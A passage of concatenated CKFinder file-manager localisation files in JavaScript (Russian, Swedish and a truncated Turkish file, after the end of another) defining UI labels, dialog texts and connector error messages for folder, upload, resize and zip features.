thumbnailSmall : 'Mala (%s)', thumbnailMedium : 'Srednja (%s)', thumbnailLarge : 'Velika (%s)', newSize : 'Postavi novu veličinu', width : 'Širina', height : 'Visina', invalidHeight : 'Neispravna visina.', invalidWidth : 'Neispravna širina.', invalidName : 'Neispravan naziv datoteke.', newImage : 'Napravi novu sliku', noExtensionChange : 'Vrsta datoteke se ne smije mijenjati.', imageSmall : 'Izvorna slika je premala.', contextMenuName : 'Promijeni veličinu', lockRatio : 'Zaključaj odnose', resetSize : 'Vrati veličinu' }, // Fileeditor plugin Fileeditor : { save : 'Snimi', fileOpenError : 'Nije moguće otvoriti datoteku.', fileSaveSuccess : 'Datoteka je uspješno snimljena.', contextMenuName : 'Promjeni', loadingFile : 'Učitavam, molimo pričekajte...' }, Maximize : { maximize : 'Povećaj', minimize : 'Smanji' }, Gallery : { current : 'Slika {current} od {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Russian * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['ru'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, недоступно</span>', confirmCancel : 'Внесенные вами изменения будут утеряны. Вы уверены?', ok : 'OK', cancel : 'Отмена', confirmationTitle : 'Подтверждение', messageTitle : 'Информация', inputTitle : 'Вопрос', undo : 'Отменить', redo : 'Повторить', skip : 'Пропустить', skipAll : 'Пропустить все', makeDecision : 'Что следует сделать?', rememberDecision: 'Запомнить мой выбор' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'ru', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'dd.mm.yyyy H:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Папки', FolderLoading : 'Загрузка...', FolderNew : 'Пожалуйста, введите новое имя папки: ', FolderRename : 'Пожалуйста, введите новое имя папки: ', FolderDelete : 'Вы уверены, что хотите удалить папку "%1"?', FolderRenaming : ' (Переименовываю...)', FolderDeleting : ' (Удаляю...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Пожалуйста, введите новое имя файла: ', FileRenameExt : 'Вы уверены, что хотите изменить расширение файла? Файл может стать недоступным.', FileRenaming : 'Переименовываю...', FileDelete : 'Вы уверены, что хотите удалить файл "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Загрузка...', FilesEmpty : 'Пустая папка', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Корзина', BasketClear : 'Очистить корзину', BasketRemove : 'Убрать из корзины', BasketOpenFolder : 'Перейти в папку этого файла', BasketTruncateConfirm : 'Вы точно хотите очистить корзину?', BasketRemoveConfirm : 'Вы точно хотите убрать файл "%1" из корзины?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'В корзине пока нет файлов, добавьте новые с помощью драг-н-дропа (перетащите файл в корзину).', BasketCopyFilesHere : 'Скопировать файл из корзины', BasketMoveFilesHere : 'Переместить файл из корзины', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Загрузить файл', UploadTip : 'Загрузить новый файл', Refresh : 'Обновить список', Settings : 'Настройка', Help : 'Помощь', HelpTip : 'Помощь', // Context Menus Select : 'Выбрать', SelectThumbnail : 'Выбрать миниатюру', View : 'Посмотреть', Download : 'Сохранить', NewSubFolder : 'Новая папка', Rename : 'Переименовать', Delete : 'Удалить', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Копировать', MoveDragDrop : 'Переместить', // Dialogs RenameDlgTitle : 'Переименовать', NewNameDlgTitle : 'Новое имя', FileExistsDlgTitle : 'Файл уже существует', SysErrorDlgTitle : 'Системная ошибка', FileOverwrite : 'Заменить файл', FileAutorename : 'Автоматически переименовывать', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'ОК', CancelBtn : 'Отмена', CloseBtn : 'Закрыть', // Upload Panel UploadTitle : 'Загрузить новый файл', UploadSelectLbl : 'Выбрать файл для загрузки', UploadProgressLbl : '(Загрузка в процессе, пожалуйста подождите...)', UploadBtn : 'Загрузить выбранный файл', UploadBtnCancel : 'Отмена', UploadNoFileMsg : 'Пожалуйста, выберите файл на вашем компьютере.', UploadNoFolder : 'Пожалуйста, выберите папку, в которую вы хотите загрузить файл.', UploadNoPerms : 'Загрузка файлов запрещена.', UploadUnknError : 'Ошибка при передаче файла.', UploadExtIncorrect : 'В эту папку нельзя загружать файлы с таким расширением.', // Flash Uploads UploadLabel : 'Файлы для загрузки', UploadTotalFiles : 'Всего файлов:', UploadTotalSize : 'Общий размер:', UploadSend : 'Загрузить файл', UploadAddFiles : 'Добавить файлы', UploadClearFiles : 'Очистить', UploadCancel : 'Отменить загрузку', UploadRemove : 'Убрать', UploadRemoveTip : 'Убрать !f', UploadUploaded : 'Загружено !n%', UploadProcessing : 'Загружаю...', // Settings Panel SetTitle : 'Настройка', SetView : 'Внешний вид:', SetViewThumb : 'Миниатюры', SetViewList : 'Список', SetDisplay : 'Показывать:', SetDisplayName : 'Имя файла', SetDisplayDate : 'Дата', SetDisplaySize : 'Размер файла', SetSort : 'Сортировка:', SetSortName : 'по имени файла', SetSortDate : 'по дате', SetSortSize : 'по размеру', SetSortExtension : 'по расширению', // Status Bar FilesCountEmpty : '<Пустая папка>', FilesCountOne : '1 файл', FilesCountMany : '%1 файлов', // Size and Speed Kb : '%1 KБ', Mb : '%1 MB', // MISSING Gb : '%1 GB', // MISSING SizePerSecond : '%1/s', // MISSING // Connector Error Messages. ErrorUnknown : 'Невозможно завершить запрос. (Ошибка %1)', Errors : { 10 : 'Неверная команда.', 11 : 'Тип ресурса не указан в запросе.', 12 : 'Неверный запрошенный тип ресурса.', 102 : 'Неверное имя файла или папки.', 103 : 'Невозможно завершить запрос из-за ограничений авторизации.', 104 : 'Невозможно завершить запрос из-за ограничения разрешений файловой системы.', 105 : 'Неверное расширение файла.', 109 : 'Неверный запрос.', 110 : 'Неизвестная ошибка.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Файл или папка с таким именем уже существует.', 116 : 'Папка не найдена. Пожалуйста, обновите вид папок и попробуйте еще раз.', 117 : 'Файл не найден. Пожалуйста, обновите список файлов и попробуйте еще раз.', 118 : 'Исходное расположение файла совпадает с указанным.', 201 : 'Файл с таким именем уже существует. Загруженный файл был переименован в "%1".', 202 : 'Неверный файл.', 203 : 'Неверный файл. Размер файла слишком большой.', 204 : 'Загруженный файл поврежден.', 205 : 'Недоступна временная папка для загрузки файлов на сервер.', 206 : 'Загрузка отменена из-за соображений безопасности. Файл содержит похожие на HTML данные.', 207 : 'Загруженный файл был переименован в "%1".', 300 : 'Произошла ошибка при перемещении файла(ов).', 301 : 'Произошла ошибка при копировании файла(ов).', 500 : 'Браузер файлов отключен из-за соображений безопасности. Пожалуйста, сообщите вашему системному администратру и проверьте конфигурационный файл CKFinder.', 501 : 'Поддержка миниатюр отключена.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Имя файла не может быть пустым.', FileExists : 'Файл %s уже существует.', FolderEmpty : 'Имя папки не может быть пустым.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Имя файла не может содержать любой из перечисленных символов: \n\\ / : * ? " < > |', FolderInvChar : 'Имя папки не может содержать любой из перечисленных символов: \n\\ / : * ? " < > |', PopupBlockView : 'Невозможно открыть файл в новом окне. Пожалуйста, проверьте настройки браузера и отключите блокировку всплывающих окон для этого сайта.', XmlError : 'Ошибка при разборе XML-ответа сервера.', XmlEmpty : 'Невозможно прочитать XML-ответ сервера, получена пустая строка.', XmlRawResponse : 'Необработанный ответ сервера: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Изменить размеры %s', sizeTooBig : 'Нельзя указывать размеры больше, чем у оригинального файла (%size).', resizeSuccess : 'Размеры успешно изменены.', thumbnailNew : 'Создать миниатюру(ы)', thumbnailSmall : 'Маленькая (%s)', thumbnailMedium : 'Средняя (%s)', thumbnailLarge : 'Большая (%s)', newSize : 'Установить новые размеры', width : 'Ширина', height : 'Высота', invalidHeight : 'Высота должна быть числом больше нуля.', invalidWidth : 'Ширина должна быть числом больше нуля.', invalidName : 'Неверное имя файла.', newImage : 'Сохранить как новый файл', noExtensionChange : 'Не удалось поменять расширение файла.', imageSmall : 'Исходная картинка слишком маленькая.', contextMenuName : 'Изменить размер', lockRatio : 'Сохранять пропорции', resetSize : 'Вернуть обычные размеры' }, // Fileeditor plugin Fileeditor : { save : 'Сохранить', fileOpenError : 'Не удалось открыть файл.', fileSaveSuccess : 'Файл успешно сохранен.', contextMenuName : 'Редактировать', loadingFile : 'Файл загружается, пожалуйста подождите...' }, Maximize : { maximize : 'Развернуть', minimize : 'Свернуть' }, Gallery : { current : 'Image {current} of {total}' // MISSING }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Swedish * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['sv'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, Ej tillgänglig</span>', confirmCancel : 'Några av alternativen har ändrats. Är du säker på att du vill stänga dialogrutan?', ok : 'OK', cancel : 'Avbryt', confirmationTitle : 'Bekräftelse', messageTitle : 'Information', inputTitle : 'Fråga', undo : 'Ångra', redo : 'Gör om', skip : 'Hoppa över', skipAll : 'Hoppa över alla', makeDecision : 'Vilken åtgärd ska utföras?', rememberDecision: 'Kom ihåg mitt val' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'sv', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'yyyy-mm-dd HH:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Mappar', FolderLoading : 'Laddar...', FolderNew : 'Skriv namnet på den nya mappen: ', FolderRename : 'Skriv det nya namnet på mappen: ', FolderDelete : 'Är du säker på att du vill radera mappen "%1"?', FolderRenaming : ' (Byter mappens namn...)', FolderDeleting : ' (Raderar...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Skriv det nya filnamnet: ', FileRenameExt : 'Är du säker på att du vill ändra filändelsen? Filen kan bli oanvändbar.', FileRenaming : 'Byter filnamn...', FileDelete : 'Är du säker på att du vill radera filen "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Laddar...', FilesEmpty : 'Mappen är tom.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Filkorg', BasketClear : 'Rensa filkorgen', BasketRemove : 'Ta bort från korgen', BasketOpenFolder : 'Öppna överliggande mapp', BasketTruncateConfirm : 'Vill du verkligen ta bort alla filer från korgen?', BasketRemoveConfirm : 'Vill du verkligen ta bort filen "%1" från korgen?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Inga filer i korgen, dra och släpp några.', BasketCopyFilesHere : 'Kopiera filer från korgen', BasketMoveFilesHere : 'Flytta filer från korgen', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Ladda upp', UploadTip : 'Ladda upp en ny fil', Refresh : 'Uppdatera', Settings : 'Inställningar', Help : 'Hjälp', HelpTip : 'Hjälp', // Context Menus Select : 'Infoga bild', SelectThumbnail : 'Infoga som tumnagel', View : 'Visa', Download : 'Ladda ner', NewSubFolder : 'Ny Undermapp', Rename : 'Byt namn', Delete : 'Radera', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Kopiera hit', MoveDragDrop : 'Flytta hit', // Dialogs RenameDlgTitle : 'Byt namn', NewNameDlgTitle : 'Nytt namn', FileExistsDlgTitle : 'Filen finns redan', SysErrorDlgTitle : 'Systemfel', FileOverwrite : 'Skriv över', FileAutorename : 'Auto-namnändring', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'OK', CancelBtn : 'Avbryt', CloseBtn : 'Stäng', // Upload Panel UploadTitle : 'Ladda upp en ny fil', UploadSelectLbl : 'Välj fil att ladda upp', UploadProgressLbl : '(Laddar upp filen, var god vänta...)', UploadBtn : 'Ladda upp den valda filen', UploadBtnCancel : 'Avbryt', UploadNoFileMsg : 'Välj en fil från din dator.', UploadNoFolder : 'Välj en mapp före uppladdning.', UploadNoPerms : 'Filuppladdning ej tillåten.', UploadUnknError : 'Fel vid filuppladdning.', UploadExtIncorrect : 'Filändelsen är inte tillåten i denna mapp.', // Flash Uploads UploadLabel : 'Filer att ladda upp', UploadTotalFiles : 'Totalt antal filer:', UploadTotalSize : 'Total storlek:', UploadSend : 'Ladda upp', UploadAddFiles : 'Lägg till filer', UploadClearFiles : 'Rensa filer', UploadCancel : 'Avbryt uppladdning', UploadRemove : 'Ta bort', UploadRemoveTip : 'Ta bort !f', UploadUploaded : 'Uppladdat !n%', UploadProcessing : 'Bearbetar...', // Settings Panel SetTitle : 'Inställningar', SetView : 'Visa:', SetViewThumb : 'Tumnaglar', SetViewList : 'Lista', SetDisplay : 'Visa:', SetDisplayName : 'Filnamn', SetDisplayDate : 'Datum', SetDisplaySize : 'Storlek', SetSort : 'Sortering:', SetSortName : 'Filnamn', SetSortDate : 'Datum', SetSortSize : 'Storlek', SetSortExtension : 'Filändelse', // Status Bar FilesCountEmpty : '<Tom Mapp>', FilesCountOne : '1 fil', FilesCountMany : '%1 filer', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Begäran kunde inte utföras eftersom ett fel uppstod. (Fel %1)', Errors : { 10 : 'Ogiltig begäran.', 11 : 'Resursens typ var inte specificerad i förfrågan.', 12 : 'Den efterfrågade resurstypen är inte giltig.', 102 : 'Ogiltigt fil- eller mappnamn.', 103 : 'Begäran kunde inte utföras p.g.a. restriktioner av rättigheterna.', 104 : 'Begäran kunde inte utföras p.g.a. restriktioner av rättigheter i filsystemet.', 105 : 'Ogiltig filändelse.', 109 : 'Ogiltig begäran.', 110 : 'Okänt fel.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'En fil eller mapp med aktuellt namn finns redan.', 116 : 'Mappen kunde inte hittas. Var god uppdatera sidan och försök igen.', 117 : 'Filen kunde inte hittas. Var god uppdatera sidan och försök igen.', 118 : 'Sökväg till källa och mål är identisk.', 201 : 'En fil med aktuellt namn fanns redan. Den uppladdade filen har döpts om till "%1".', 202 : 'Ogiltig fil.', 203 : 'Ogiltig fil. Filen var för stor.', 204 : 'Den uppladdade filen var korrupt.', 205 : 'En tillfällig mapp för uppladdning är inte tillgänglig på servern.', 206 : 'Uppladdningen stoppades av säkerhetsskäl. Filen innehåller HTML-liknande data.', 207 : 'Den uppladdade filen har döpts om till "%1".', 300 : 'Flytt av fil(er) misslyckades.', 301 : 'Kopiering av fil(er) misslyckades.', 500 : 'Filhanteraren har stoppats av säkerhetsskäl. Var god kontakta administratören för att kontrollera konfigurationsfilen för CKFinder.', 501 : 'Stöd för tumnaglar har stängts av.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Filnamnet får inte vara tomt.', FileExists : 'Filen %s finns redan.', FolderEmpty : 'Mappens namn får inte vara tomt.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Filnamnet får inte innehålla något av följande tecken: \n\\ / : * ? " < > |', FolderInvChar : 'Mappens namn får inte innehålla något av följande tecken: \n\\ / : * ? " < > |', PopupBlockView : 'Det gick inte att öppna filen i ett nytt fönster. Ändra inställningarna i din webbläsare så att den tillåter popup-fönster på den här webbplatsen.', XmlError : 'Det gick inte att ladda XML-svaret från webbservern ordentligt.', XmlEmpty : 'Det gick inte att ladda XML-svaret från webbservern. Servern returnerade ett tomt svar.', XmlRawResponse : 'Svar från servern: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Storleksändra %s', sizeTooBig : 'Bildens höjd eller bredd kan inte vara större än originalfilens storlek (%size).', resizeSuccess : 'Storleksändring lyckades.', thumbnailNew : 'Skapa en ny tumnagel', thumbnailSmall : 'Liten (%s)', thumbnailMedium : 'Mellan (%s)', thumbnailLarge : 'Stor (%s)', newSize : 'Välj en ny storlek', width : 'Bredd', height : 'Höjd', invalidHeight : 'Ogiltig höjd.', invalidWidth : 'Ogiltig bredd.', invalidName : 'Ogiltigt filnamn.', newImage : 'Skapa en ny bild', noExtensionChange : 'Filändelsen kan inte ändras.', imageSmall : 'Originalbilden är för liten.', contextMenuName : 'Ändra storlek', lockRatio : 'Lås höjd/bredd förhållanden', resetSize : 'Återställ storlek' }, // Fileeditor plugin Fileeditor : { save : 'Spara', fileOpenError : 'Kan inte öppna filen.', fileSaveSuccess : 'Filen sparades.', contextMenuName : 'Redigera', loadingFile : 'Laddar fil, var god vänta...' }, Maximize : { maximize : 'Maximera', minimize : 'Minimera' }, Gallery : { current : 'Bild {current} av {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object, for the Turkish * language. * * Turkish translation by Abdullah M CEYLAN a.k.a. Kenan Balamir. Updated. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['tr'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility"> öğesi, mevcut değil</span>', confirmCancel : 'Bazı seçenekler değiştirildi. Pencereyi kapatmak istiyor musunuz?', ok : 'Tamam', cancel : 'Vazgeç', confirmationTitle : 'Onay', messageTitle : 'Bilgi', inputTitle : 'Soru', undo : 'Geri Al', redo : 'Yinele', skip : 'Atla', skipAll : 'Tümünü Atla', makeDecision : 'Hangi işlem yapılsın?', rememberDecision: 'Kararımı hatırla' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'tr', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'd/m/yyyy h:MM aa', DateAmPm : ['GN', 'GC'], // Folders FoldersTitle : 'Klasörler', FolderLoading : 'Yükleniyor...', FolderNew : 'Lütfen yeni klasör adını yazın: ', FolderRename : 'Lütfen yeni klasör adını yazın: ', FolderDelete : '"%1" klasörünü silmek istediğinizden emin misiniz?', FolderRenaming : ' (Yeniden adlandırılıyor...)', FolderDeleting : ' (Siliniyor...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Lütfen yeni dosyanın adını yazın: ', FileRenameExt : 'Dosya uzantısını değiştirmek istiyor musunuz? Bu, dosyayı kullanılamaz hale getirebilir.', FileRenaming : 'Yeniden adlandırılıyor...', FileDelete : '"%1" dosyasını silmek istediğinizden emin misiniz?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Yükleniyor...', FilesEmpty : 'Klasör boş', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Sepet', BasketClear : 'Sepeti temizle', BasketRemove : 'Sepetten sil', BasketOpenFolder : 'Üst klasörü aç', BasketTruncateConfirm : 'Sepetteki tüm dosyaları silmek istediğinizden emin misiniz?', BasketRemoveConfirm : 'Sepetteki %1% dosyasını silmek istediğinizden emin misiniz?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Sepette hiç dosya yok, birkaç tane sürükleyip bırakabilirsiniz', BasketCopyFilesHere : 'Sepetten Dosya Kopyala', BasketMoveFilesHere : 'Sepetten Dosya Taşı', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Yükle', UploadTip : 'Yeni Dosya Yükle', Refresh : 'Yenile', Settings : 'Ayarlar', Help : 'Yardım', HelpTip : 'Yardım', // Context Menus Select : 'Seç', SelectThumbnail : 'Önizleme Olarak Seç', View : 'Görüntüle', Download : 'İndir', NewSubFolder : 'Yeni Altklasör', Rename : 'Yeniden Adlandır', Delete : 'Sil', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Buraya kopyala', MoveDragDrop : 'Buraya taşı', // Dialogs RenameDlgTitle : 'Yeniden Adlandır', NewNameDlgTitle : 'Yeni Adı', FileExistsDlgTitle : 'Dosya zaten var', SysErrorDlgTitle : 'Sistem hatası', FileOverwrite : 'Üzerine yaz', FileAutorename : 'Oto-Yeniden Adlandır', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'Tamam', CancelBtn : 'Vazgeç', CloseBtn : 'Kapat', // Upload Panel UploadTitle : 'Yeni Dosya Yükle', UploadSelectLbl : 'Yüklenecek dosyayı seçin', UploadProgressLbl : '(Yükleniyor, lütfen bekleyin...)', UploadBtn : 'Seçili Dosyayı Yükle', UploadBtnCancel : 'Vazgeç', UploadNoFileMsg : 'Lütfen bilgisayarınızdan dosya seçin', UploadNoFolder : 'Lütfen yüklemeden önce klasör seçin.', UploadNoPerms : 'Dosya yüklemeye izin verilmiyor.', UploadUnknError : 'Dosya gönderme hatası.', UploadExtIncorrect : 'Bu dosya uzantısına, bu klasörde izin verilmiyor.', // Flash Uploads UploadLabel : 'Gönderilecek Dosyalar', UploadTotalFiles : 'Toplam Dosyalar:', UploadTotalSize : 'Toplam Büyüklük:', UploadSend : 'Yükle', UploadAddFiles : 'Dosyaları Ekle', UploadClearFiles : 'Dosyaları Temizle', UploadCancel : 'Göndermeyi İptal Et', UploadRemove : 'Sil', UploadRemoveTip : '!f sil', UploadUploaded : '!n% gönderildi', UploadProcessing : 'Gönderiliyor...', // Settings Panel SetTitle : 'Ayarlar', SetView : 'Görünüm:', SetViewThumb : 'Önizlemeler', SetViewList : 'Liste', SetDisplay : 'Gösterim:', SetDisplayName : 'Dosya adı', SetDisplayDate : 'Tarih', SetDisplaySize : 'Dosya boyutu', SetSort : 'Sıralama:', SetSortName : 'Dosya adına göre', SetSortDate : 'Tarihe göre', SetSortSize : 'Boyuta göre', SetSortExtension : 'Uzantısına göre', // Status Bar FilesCountEmpty : '<Klasörde Dosya Yok>', FilesCountOne : '1 dosya', FilesCountMany : '%1 dosya', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/sn', // Connector Error Messages. ErrorUnknown : 'İsteğinizi yerine getirmek mümkün değil. (Hata %1)', Errors : { 10 : 'Geçersiz komut.', 11 : 'İstekte kaynak türü belirtilmemiş.', 12 : 'Talep edilen kaynak türü geçersiz.', 102 : 'Geçersiz dosya ya da klasör adı.', 103 : 'Kimlik doğrulama kısıtlamaları nedeni ile talebinizi yerine getiremiyoruz.', 104 : 'Dosya sistemi kısıtlamaları nedeni ile talebinizi yerine getiremiyoruz.', 105 : 'Geçersiz dosya uzantısı.', 109 : 'Geçersiz istek.', 110 : 'Bilinmeyen hata.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Aynı isimde bir dosya ya da klasör zaten var.', 116 : 'Klasör bulunamadı. Lütfen yenileyin ve tekrar deneyin.', 117 : 'Dosya bulunamadı. Lütfen dosya listesini yenileyin ve tekrar deneyin.', 118 : 'Kaynak ve hedef yol aynı!', 201 : 'Aynı ada sahip bir dosya zaten var. Yüklenen dosyanın adı "%1" olarak değiştirildi.', 202 : 'Geçersiz dosya', 203 : 'Geçersiz dosya. Dosya boyutu çok büyük.', 204 : 'Yüklenen dosya bozuk.', 205 : 'Dosyaları yüklemek için gerekli geçici klasör sunucuda bulunamadı.', 206 : 'Güvenlik nedeni ile yükleme iptal edildi. Dosya HTML benzeri veri içeriyor.', 207 : 'Yüklenen dosyanın adı "%1" olarak değiştirildi.', 300 : 'Dosya taşıma işlemi başarısız.', 301 : 'Dosya kopyalama işlemi başarısız.', 500 : 'Güvenlik nedeni ile dosya gezgini devredışı bırakıldı. Lütfen sistem yöneticiniz ile irtibata geçin ve CKFinder yapılandırma dosyasını kontrol edin.', 501 : 'Önizleme desteği devredışı.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Dosya adı boş olamaz', FileExists : '%s dosyası zaten var', FolderEmpty : 'Klasör adı boş olamaz', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Dosya adının içermesi mümkün olmayan karakterler: \n\\ / : * ? " < > |', FolderInvChar : 'Klasör adının içermesi mümkün olmayan karakterler: \n\\ / : * ? " < > |', PopupBlockView : 'Dosyayı yeni pencerede açmak için, tarayıcı ayarlarından bu sitenin açılır pencerelerine izin vermeniz gerekiyor.', XmlError : 'Web sunucusundan XML yanıtı düzgün bir şekilde yüklenemedi.', XmlEmpty : 'Web sunucusundan XML yanıtı düzgün bir şekilde yüklenemedi. Sunucudan boş cevap döndü.', XmlRawResponse : 'Sunucudan gelen ham mesaj: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Boyutlandır: %s', sizeTooBig : 'Yükseklik ve genişlik değeri orijinal boyuttan büyük olduğundan, işlem gerçekleştirilemedi (%size).', resizeSuccess : 'Resim başarıyla yeniden boyutlandırıldı.', thumbnailNew : 'Yeni önizleme oluştur', thumbnailSmall : 'Küçük (%s)', thumbnailMedium : 'Orta (%s)', thumbnailLarge : 'Büyük (%s)', newSize : 'Yeni boyutu ayarla', width : 'Genişlik', height : 'Yükseklik', invalidHeight : 'Geçersiz yükseklik.', invalidWidth : 'Geçersiz genişlik.', invalidName : 'Geçersiz dosya adı.', newImage : 'Yeni resim oluştur', noExtensionChange : 'Dosya uzantısı değiştirilemedi.', imageSmall : 'Kaynak resim çok küçük', contextMenuName : 'Boyutlandır', lockRatio : 'Oranı kilitle', resetSize : 'Büyüklüğü sıfırla' }, // Fileeditor plugin Fileeditor : { save : 'Kaydet', fileOpenError : 'Dosya açılamadı.', fileSaveSuccess : 'Dosya başarıyla 